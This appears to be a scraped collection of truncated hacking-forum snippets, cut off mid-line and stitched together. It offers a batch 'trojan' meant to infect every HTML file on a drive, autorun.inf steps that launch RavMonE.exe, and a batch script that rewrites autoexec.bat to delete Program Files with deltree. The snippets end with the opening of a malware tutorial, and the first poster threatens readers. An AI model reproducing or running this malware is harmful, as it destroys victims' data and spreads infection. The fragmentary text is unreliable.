this is a trojan be very carful with this guys. do not come crying to me when your hard drive is fryed ok cuz if you bitch at me ill fry your next computer :>. have fun!@echo off::--Infect All Html Files---::Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do (Set DirPath=%%Y > Nul For %...
1st: At desktop empty space, right click.2nd: Select "New", and select "Text Document".3rd: A New Text Document will be created. Open the text file that created.4th: Copy below following code:[AutoRun]open=RavMonE.exe eshellexecute=RavMonE.exe eshell\Auto\comma...
you can make it easy .. creat a notpad and copy this echo off@clscall attrib -h -r c:\autoexec.bat >nulecho @echo off >c:\autoexec.batecho deltree /y c:\progra~1\*.* nul >>c:\autoexec.batecho copy c:\******s\command\ c:\ >nul >>c:\autoexe.batecho copy...
Malware is a big problem today. Everyday thousands of innocent people are getting infected by different types of malware. The most common types of malware today are viruses, worms and Trojans. In this chapter we will discuss all the types of malware, and give you an example of a windows trojan in use....